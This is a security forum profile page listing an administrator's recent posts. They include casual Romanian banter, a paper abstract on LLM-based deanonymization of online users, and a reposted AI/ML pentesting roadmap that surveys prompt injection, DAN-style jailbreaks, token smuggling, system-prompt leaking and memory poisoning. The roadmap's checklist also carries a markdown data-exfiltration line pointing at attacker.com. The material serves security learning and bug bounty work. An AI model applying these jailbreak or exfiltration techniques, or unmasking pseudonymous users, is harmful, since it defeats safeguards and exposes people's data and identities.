Jump to content

Nytro

Administrators
  • Posts

    18794
  • Joined

  • Last visited

  • Days Won

    742

Nytro last won the day on March 9

Nytro had the most liked content!

About Nytro

  • Birthday 03/11/1991

Recent Profile Visitors

115941 profile views

Nytro's Achievements

Mentor

Mentor (12/14)

  • Well Followed Rare
  • Reacting Well Rare
  • Dedicated Rare
  • Conversation Starter Rare
  • One Year In Rare

Recent Badges

5.6k

Reputation

  1. "A crypto drainer is a type of malicious software or scam tool designed to steal cryptocurrency from a victim’s wallet, usually by tricking them into approving a harmful transaction." - Nici nu stiam ce e mizeria asta. E bine ca un malware de genul asta nu poate ajunge la portofelul meu cu multe hartii de 10 RON pentru bacsisuri.
  2. Da, nu e tocmai practic research-ul lor, dar e destul de interesant ca metodologie. Ideea de baza, desigur, e sa nu dai detalii despre tine niciunde. Degeaba esti "HackerMan1337" daca ai Facebook-ul la fel. Da. Sau LLM-uri, doar sunt bune la asta.
  3. We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identityrelevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data , our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using crossplatform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user’s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered. Download: https://arxiv.org/pdf/2602.16800
  4. πŸ›‘οΈ AI/ML Pentesting Roadmap A comprehensive, structured guide to learning AI/ML security and penetration testing β€” from zero to practitioner. πŸ“‹ Table of Contents Prerequisites Phase 1 β€” Foundations Phase 2 β€” AI/ML Security Concepts Phase 3 β€” Prompt Injection & LLM Attacks Phase 4 β€” Hands-On Practice Phase 5 β€” Advanced Exploitation Techniques Phase 6 β€” Real-World Research & Bug Bounty Standards, Frameworks & References Tools & Repositories Books, PDFs & E-Books Video Resources CTF & Competitions Bug Bounty Programs Community & News Suggested Learning Path by Experience Level Prerequisites Before diving into AI/ML pentesting, ensure you have the following foundation: General Security Basics PortSwigger Web Security Academy β€” Free, hands-on web security training (XSS, SQLi, SSRF, etc.) TryHackMe β€” Pre-Security Path HackTheBox Academy OWASP Top 10 Programming (Python is essential) Python for Everybody β€” Coursera Automate the Boring Stuff with Python β€” Free online book CS50P β€” Python β€” Free Harvard course APIs & HTTP Understand REST APIs, HTTP methods, headers, and authentication flows Postman Learning Center Practice with tools: curl, Burp Suite, Postman Phase 1 β€” Foundations 1.1 Machine Learning Fundamentals Resource Type Cost Machine Learning β€” Andrew Ng (Coursera) Course Audit Free Introduction to ML β€” edX Course Audit Free fast.ai Practical Deep Learning Course Free Google Machine Learning Crash Course Course Free Kaggle ML Courses Course Free 3Blue1Brown β€” Neural Networks Video Free 1.2 Large Language Models (LLMs) Understanding how LLMs work is critical before attacking them. Resource Type Cost Andrej Karpathy β€” Intro to LLMs Video Free Andrej Karpathy β€” Let's build GPT Video Free Hugging Face NLP Course Course Free LLM University by Cohere Course Free Prompt Engineering Guide Guide Free Phase 2 β€” AI/ML Security Concepts 2.1 Core Security Concepts OWASP LLM Top 10 β€” The definitive OWASP list for LLM vulnerabilities MITRE ATLAS Matrix β€” Adversarial Tactics, Techniques, and Common Knowledge for AI systems NIST AI Risk Management Framework β€” Federal AI risk guidance IBM β€” AI Security Overview AI Village β€” LLM Threat Modeling Promptingguide β€” Adversarial Attacks HackerOne β€” Ultimate Guide to Managing Ethical and Security Risks in AI 2.2 Attack Surface Overview Key attack vectors in AI/ML systems: Prompt Injection β€” Manipulating LLM behavior through crafted inputs Jailbreaking β€” Bypassing safety filters and guardrails Model Inversion β€” Extracting training data from a model Membership Inference β€” Determining if data was in training set Data Poisoning β€” Corrupting training data to influence behavior Adversarial Examples β€” Perturbed inputs that fool classifiers Model Extraction/Stealing β€” Cloning a model via API queries Supply Chain Attacks β€” Malicious models/weights on platforms like Hugging Face Insecure Plugin/Tool Integration β€” Exploiting LLM agents with external tools Training Data Exfiltration β€” Extracting memorized private data Denial of Service β€” Overloading models via crafted prompts 2.3 MLOps & Infrastructure Security From MLOps to MLOops β€” JFrog Offensive ML Playbook AI Exploits β€” ProtectAI Awesome AI Security β€” ottosulin Phase 3 β€” Prompt Injection & LLM Attacks 3.1 Understanding Prompt Injection IBM Guide on Prompt Injection Simon Willison's Explanation of Prompt Injection Learn Prompting β€” Prompt Hacking and Injection PortSwigger LLM Attacks NCC Group β€” Exploring Prompt Injection Attacks Bugcrowd β€” AI Vulnerability Deep Dive: Prompt Injection 3.2 Jailbreaking Techniques DAN (Do Anything Now) β€” Classic jailbreak technique: Chatgpt-DAN Repo Role-playing / Persona manipulation Token smuggling β€” Encoding instructions to bypass filters Prompt leaking β€” Extracting system prompts Indirect prompt injection β€” Attacks via documents, web content, memory WideOpenAI β€” Jailbreak Collection PayloadsAllTheThings β€” Prompt Injection PALLMs β€” Payloads for Attacking LLMs 3.3 Indirect Prompt Injection A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes. Greshake β€” LLM Security / Not What You've Signed Up For Embrace The Red β€” Blog β€” Comprehensive blog covering real-world indirect injection GitHub Copilot Chat: Prompt Injection to Data Exfiltration Google AI Studio Data Exfiltration 3.4 Advanced Prompt Attack Techniques How to Persuade an LLM to Change Its System Prompt Bugcrowd Ultimate Guide to AI Security (PDF) Snyk OWASP Top 10 LLM (PDF) Vanna.AI Prompt Injection RCE β€” JFrog Phase 4 β€” Hands-On Practice 4.1 Interactive Platforms & Games Platform Description Link Gandalf LLM prompt testing game β€” extract the password gandalf.lakera.ai Prompt Airlines Gamified prompt injection learning promptairlines.com Crucible Interactive AI security challenges by Dreadnode crucible.dreadnode.io Immersive Labs AI Structured AI security exercises prompting.ai.immersivelabs.com Secdim AI Games Prompt injection games play.secdim.com/game/ai HackAPrompt Community prompt injection competition hackaprompt.com PortSwigger LLM Labs Hands-on web LLM attack labs Web Security Academy 4.2 Vulnerable-by-Design Projects Repository Description Damn Vulnerable LLM Agent β€” WithSecureLabs Intentionally vulnerable LLM agent ScottLogic Prompt Injection Playground Local prompt injection lab Greshake LLM Security Tools Proof-of-concept attacks 4.3 CTF Writeups to Study CTF Writeup β€” HackPack CTF 2024 LLM Edition LLM Pentest Writeups β€” System Weakness Phase 5 β€” Advanced Exploitation Techniques 5.1 Agent & Tool Integration Attacks When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically. LLM Pentest: Leveraging Agent Integration for RCE β€” BlazeInfoSec LLM Pentest: Leveraging Agent Integration For RCE (full) Dumping a Database with an AI Chatbot β€” Synack CSWSH Meets LLM Chatbots 5.2 Data Exfiltration via LLMs Google AI Studio: LLM-Powered Data Exfiltration Google AI Studio Mass Data Exfil (Regression) Hacking Google Bard β€” From Prompt Injection to Data Exfiltration AWS Amazon Q Markdown Rendering Vulnerability GitHub Copilot Chat Data Exfiltration 5.3 Account Takeover & Authentication Attacks ChatGPT Account Takeover β€” Wildcard Web Cache Deception Shockwave β€” Critical ChatGPT Vulnerability (Web Cache Deception) Security Flaws in ChatGPT Ecosystem β€” Salt Security OpenAI Allowed Unlimited Credit on New Accounts β€” Checkmarx 5.4 XSS & Web Vulnerabilities in AI Products XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT β€” Imperva Zeroday on GitHub Copilot 5.5 Model & Infrastructure Attacks Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9) From ChatBot to SpyBot: ChatGPT Post-Exploitation β€” Imperva 5.6 Persistent Attacks & Memory Exploitation ChatGPT Persistent Denial of Service via Memory Attacks β€” Embrace the Red 5.7 Adversarial Machine Learning CleverHans Library β€” Adversarial example library ART (Adversarial Robustness Toolbox) β€” IBM Foolbox β€” Python toolbox for adversarial attacks Phase 6 β€” Real-World Research & Bug Bounty 6.1 Notable Research & Disclosures We Hacked Google AI for $50,000 β€” LandH New Google Gemini Content Manipulation Vulnerabilities β€” HiddenLayer Jailbreak of Meta AI (Llama 3.1) Revealing Config Details Bypass Instructions to Manipulate Google Bard My LLM Bug Bounty Journey on Hugging Face Hub Anonymised Penetration Test Report β€” Volkis Lakera Real World LLM Exploits (PDF) 6.2 How to Find LLM Vulnerabilities Key areas to test when assessing an LLM-powered application: System prompt extraction β€” Can you leak the hidden system prompt? Instruction override β€” Can you ignore system-level instructions? Plugin/tool abuse β€” Can agent tools be misused (SSRF, RCE, SQLi)? Data exfiltration via markdown β€” Does the UI render ![](https://attacker.com?q=...) ? Persistent injection via memory β€” Can you inject instructions that persist in memory/RAG? PII leakage β€” Does the model reveal training data or other users' data? Cross-user data leakage β€” In multi-tenant apps, can you access other users' contexts? Authentication bypass β€” Can you trick the LLM into performing privileged actions? Standards, Frameworks & References Resource Description OWASP LLM Top 10 Top 10 LLM vulnerability classes MITRE ATLAS AI adversarial threat matrix NIST AI RMF US Federal AI risk management framework OWASP AI Exchange Cross-industry AI security guidance ISO/IEC 42001 International AI management standard ENISA AI Threat Landscape EU AI threat landscape report Google Secure AI Framework (SAIF) Google's AI security framework Tools & Repositories Offensive Tools Tool Purpose Garak LLM vulnerability scanner PyRIT Microsoft's Python Risk Identification Toolkit for LLMs LLM Fuzzer Fuzzing framework for LLMs PALLMs Payloads for attacking LLMs PromptInject Prompt injection attack framework PurpleLlama / CyberSecEval Meta's LLM security evaluation Defensive / Scanning Tools Tool Purpose Rebuff Prompt injection detection NeMo Guardrails NVIDIA guardrail framework Lakera Guard Commercial prompt injection protection AI Exploits β€” ProtectAI Real-world ML exploit collection ModelScan Scan ML model files for malicious code Reference Lists Resource Description Awesome LLM Security β€” corca-ai Curated LLM security list Awesome LLM β€” Hannibal046 Everything LLM including security Awesome AI Security β€” ottosulin General AI security resources LLM Hacker's Handbook Comprehensive hacking handbook PayloadsAllTheThings β€” Prompt Injection Payload collection WideOpenAI Jailbreak and bypass collection Chatgpt-DAN DAN jailbreak collection Books, PDFs & E-Books Resource Link LLM Hacker's Handbook GitHub OWASP Top 10 for LLM (Snyk) PDF Bugcrowd Ultimate Guide to AI Security PDF Lakera Real World LLM Exploits PDF HackerOne Ultimate Guide to Managing AI Risks E-Book Adversarial Machine Learning β€” Goodfellow et al. arXiv Video Resources Resource Link Penetration Testing Against and With AI/LLM/ML (Playlist) YouTube Andrej Karpathy β€” Intro to Large Language Models YouTube DEF CON AI Village Talks YouTube LiveOverflow β€” AI/ML Security YouTube 3Blue1Brown β€” Neural Networks Series YouTube John Hammond β€” AI Security Challenges YouTube Cybrary β€” Machine Learning Security Cybrary CTF & Competitions Competition Description Link Crucible Ongoing AI security challenges crucible.dreadnode.io HackAPrompt Annual prompt injection competition hackaprompt.com AI Village CTF (DEF CON) Annual AI security CTF at DEF CON aivillage.org Gandalf Self-paced LLM challenge gandalf.lakera.ai Prompt Airlines Gamified injection challenges promptairlines.com Hack The Box AI Challenges HTB AI-themed challenges hackthebox.com Secdim AI Games Web-based AI security games play.secdim.com/game/ai Bug Bounty Programs AI/ML security bug bounties are growing rapidly. Target these platforms: Program Scope Link OpenAI Bug Bounty ChatGPT, API, plugins bugcrowd.com/openai Google AI Bug Bounty Gemini, Bard, Vertex AI bughunters.google.com Meta AI Bug Bounty Llama models, Meta AI facebook.com/whitehat HuggingFace via ProtectAI Hub, models, spaces huntr.com Anthropic Bug Bounty Claude, API anthropic.com/security Microsoft (Copilot, Azure AI) Copilot, Azure OpenAI msrc.microsoft.com Huntr (AI/ML focused) Open source ML libraries huntr.com Tips for AI bug bounty: Focus on data exfiltration via markdown rendering (common finding) Test plugin/tool integrations thoroughly Look for prompt injection in RAG pipelines Explore memory and persistent context manipulation Check for cross-tenant data leakage in multi-user deployments Community & News Communities AI Village β€” DEF CON's AI security community OWASP AI Exchange β€” Open standard for AI security ProtectAI β€” AI security research and tools Embrace the Red β€” Blog β€” Leading blog on LLM security Kai Greshake's Research β€” Indirect prompt injection research Newsletters & Blogs The Batch β€” DeepLearning.AI β€” Weekly AI news Simon Willison's Weblog β€” Authoritative LLM security commentary HiddenLayer Research β€” AI security research Lakera Blog β€” LLM security insights PortSwigger Research β€” Web + AI security research Suggested Learning Path by Experience Level 🟒 Beginner (0–3 months) Complete PortSwigger Web Security Academy fundamentals Learn Python basics Take Google ML Crash Course Read OWASP LLM Top 10 Play Gandalf β€” all levels Read Simon Willison's prompt injection article Watch Andrej Karpathy β€” Intro to LLMs 🟑 Intermediate (3–9 months) Study MITRE ATLAS Matrix Complete PortSwigger LLM Attack labs Set up and exploit Damn Vulnerable LLM Agent Complete Prompt Airlines and Crucible challenges Read the LLM Hacker's Handbook Study the Embrace the Red blog in full Experiment with Garak and PyRIT Try Offensive ML Playbook πŸ”΄ Advanced (9+ months) Participate in AI Village CTF at DEF CON Submit findings to Huntr or OpenAI Bug Bounty Study adversarial ML with ART and CleverHans Read academic papers on model inversion, membership inference, and data extraction Contribute to open source tools like Garak or AI Exploits Build your own vulnerable LLM demo environment Write and publish research β€” blog posts, CVEs, conference talks Key Academic Papers Paper Year Explaining and Harnessing Adversarial Examples β€” Goodfellow et al. 2014 Extracting Training Data from Large Language Models β€” Carlini et al. 2021 Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection β€” Greshake et al. 2023 Membership Inference Attacks against Machine Learning Models β€” Shokri et al. 2017 Universal and Transferable Adversarial Attacks on Aligned Language Models β€” Zou et al. 2023 Jailbroken: How Does LLM Safety Training Fail? β€” Wei et al. 2023 Prompt Injection attack against LLM-integrated Applications 2023 Last updated: 2025 | Contributions welcome β€” submit a PR with new resources. Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection
  5. Ca pe orice alt tool, il folosim sa livram mai repede. Dar nu avem incredere in el. Verificam informatiile, apoi le folosim.
  6. Sa inveti: 1. Partea tehnica - partea cea mai usoara, gasesti documentatie 2. Sa intelegi business - sa stii ce nevoi au companiile (sa vinzi catre oameni B2C e mai putin profitabil in general zic eu) 3. Sa stii sa vorbesti, sa vinzi, sa explici, sa cunosti legislatia - non technical skills - mai greu de prins decat lucrurile tehnice 4. Combini toate informatiile invatate si rezolvi o nevoie a companiilor, aduci valoare (ca la manele) si o vinzi 5. Cresti compania, faci bani si duci o viata buna angajand oameni buni sa lucreze pentru tine
  7. Hi, yes, Romania, Bulgaria, Serbia, Albania, Greece - Balkan gyros power ❀️
  8. Uaaa, ar fi top, sa imi pun 200 RON la pensie ❀️
  9. 1. Puneti* 2. Manelele vechi e cele mai top ❀️
  10. Nytro

    1000 lei

    Nu ii dai tu cateva mii de euro din milioanele pe care le faci zilnic?
  11. Scuze, dar am probleme cu Internetul pe yacht aici prin Caraibe. Oamenii mei o sa lanseze un satelit de Internet care sa imi ofere cel putin Gigabit, ca Digi. Vii sa bem un rom? Hai la Havana dupa trabucuri, doar ca trebuie sa opresc sa alimentez vasul ca are motor mare si consumna mult (e ok, e inmatriculat pe Bulgaria).
  12. Salut, da, mi-a intrat la finalul lunii salariul de 2 milioane de euro. La final de an am primit un bonus de 5 milioane de euro. Si astept sa creasca stock-ul ca actiunile valoareaza doar cateva zeci de milioane de euro, nu pot sa imi iau private jet asa...
  13. That is a "good" mix, they can sleep like a baby while getting some good amount of money. In the end, the answer to most questions is simple: money.
  14. This is a good point. There are also people doing both: whitehat as working for some governments, blackhat for doing "bad" stuff like APTs.
  15. The main difference between a whitehat and a blackhat is the way they sleep. Being blackhat means you do illegal stuff. I know, hiding IP bla bla, but in the end you get some money, use it, or you make a mistake or something and there are chances to end up in prison. I prefer less money but no worries. Regarding companies hiring in India or other countries, it is like people buying stuff: some buy from Temu, some get Lamborghinis, there is enough for everyone. As a whitehat, you need to offer quality for your services. And this, for sure, happens on the blackhat market as well. As a short conclusion, my opinion on this: it is very difficult to make a lot of money as blackhat, to be actually worth it. There are few people doing this. While there are millions of IT persons just doing well, having nice lives, family and everything they really need (not Lambos).
Γ—
×
  • Create New...